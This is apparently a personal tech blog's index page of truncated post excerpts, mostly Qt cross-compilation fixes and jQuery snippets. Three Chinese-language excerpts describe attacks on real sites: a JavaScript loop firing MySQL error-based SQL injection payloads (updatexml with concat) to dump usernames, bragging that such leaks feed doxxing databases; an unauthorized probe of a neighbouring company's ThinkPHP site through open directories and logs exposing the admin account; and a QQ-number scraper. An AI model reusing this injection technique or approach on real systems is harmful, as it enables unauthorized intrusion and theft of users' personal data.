
2017-3-1 写技术

用一段代码去遍历QQ号码,然后你就可以方便地在文件里查找自己喜欢的号码了, 不过现在玩QQ号码的人应该很少了——我玩的不是号码: // 地址:http://haoma.qq.com/shop.html var ret = ""; var i=0; function nextqq(){ $(".search_mod_list ul li").each(function(){ var str = $(this).find("a").attr("href"); str = str.split('num='); str = str[1...


标签: JS

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2017-2-23 写技术

今天是真的曝了几个库,而且实现了全自动化记录数据。 一个网站可以曝出几百上千的用户信息,这下知道所谓的社工库怎么来的了吧: var bb=0; var logs = ""; for(i=1;i<400;i){ var username=new Array(); username[0] = "exp"; bb++; switch(bb){ case 1: username[1] = "-1 or updatexml(0,concat(0xa,(select concat("+i+",'+',username) from nqx_ucent...


标签: MySQL

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2017-2-22 写技术

公司隔壁是一家做图像识别的企业,去年才成立的,我最喜欢这种新鲜事物了,今天特意看了看他们的网站,用thinkphp框架做的。thinkphp有一些致命点,兴许他们没工夫处理呢。那今天就来检查检查吧。 首先,各个目录的列表权限——他们没有做处理,Application,Data,Runtime等目录一览无余,安装包都原封不动地躺在那,我清楚地看到他们改动了哪些文件。不过这些意义不是特别大,没有看到什么有价值的东西,有几个数据库脚本也只是原始安装文件。 然后,在Runtime目录下有日志文件,这个略有用,看到了登录后台,看到了登录用户‘Administrator’,而且用户只有一个,看到了一系...


标签: MySQL

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[linux]arm-linux-ar not found

2017-2-16 写技术

There's an error in compiling Qt_ARM that: arm-linux-ar not found vi src/3rdparty/webkit/Source/JavaScriptCore/Makefile.WebKit Set AR as absolute path like: AR            = /opt/crosstool/gcc-4.4.3/bin/arm-linux-ar cqs It works.


标签: linux

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[linux]invalid conversion from 'void*' to 'HB_PositionRec_*'

2017-2-15 写技术

I get some errors while compilling Qt_ARM: ../3rdparty/harfbuzz/src/harfbuzz-buffer.c: In function 'HB_Error hb_buffer_ensure(HB_BufferRec_*, HB_UInt)': ../3rdparty/harfbuzz/src/harfbuzz-buffer.c:77: error: invalid conversion from 'void*' to 'HB_PositionRec_*' ../3rdparty/harfbuzz/s...


标签: linux

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[linux] The tslib functionality test failed while installing qtlib

2017-2-14 写技术

The tslib functionality test failed!  You might need to modify the include and library search paths by editing  QMAKE_INCDIR and QMAKE_LIBDIR in  /usr/local/Qt_ARM/mkspecs/qws/linux-arm-g++. 1.If installed tslib or not? If not,install it. 2.If defined tslib path exactlly in ...


标签: linux

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[linux]__sync_add_and_fetch is not defined

2017-2-9 写技术

There's an error that "__sync_add_and_fetch is not defined" while I'm building Qt. Just because of gcc I used is version 3.4, It works after I changed gcc to version 4.6.


标签: linux

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[JS]How to set a navigation hight light dynamic

2017-1-25 写技术

How to set a navigation hight light dynamic? There is a javascript solution: var url = window.location.pathname + window.location.search; url = url.replace(/(\/(p)\/\d+)|(&p=\d+)|(\/(id)\/\d+)|(&id=\d+)|(\/(group)\/\d+)|(&group=\d+)/, ""); $(".sNav").find("a[href='" + url...


标签: JS

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[JS]How to decode xml string

2017-1-22 写技术

There's some part of my project. You must include the jquery first. var xmlDoc = $.parseXML( this.result ); var idx = 0; $(xmlDoc).find('Worksheet Table Row').each(function(){ }


标签: JS

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[JS]How to read local file in JS

2017-1-22 写技术

How to read local file in JS? function jsReadFiles(files) { if (files.length) { var file = files[0]; var reader = new FileReader(); if (/text+/.test(file.type)){ reader.onload = function(){ $('body').append('<pre>' + this.result + '</pre>'); } ...


标签: JS

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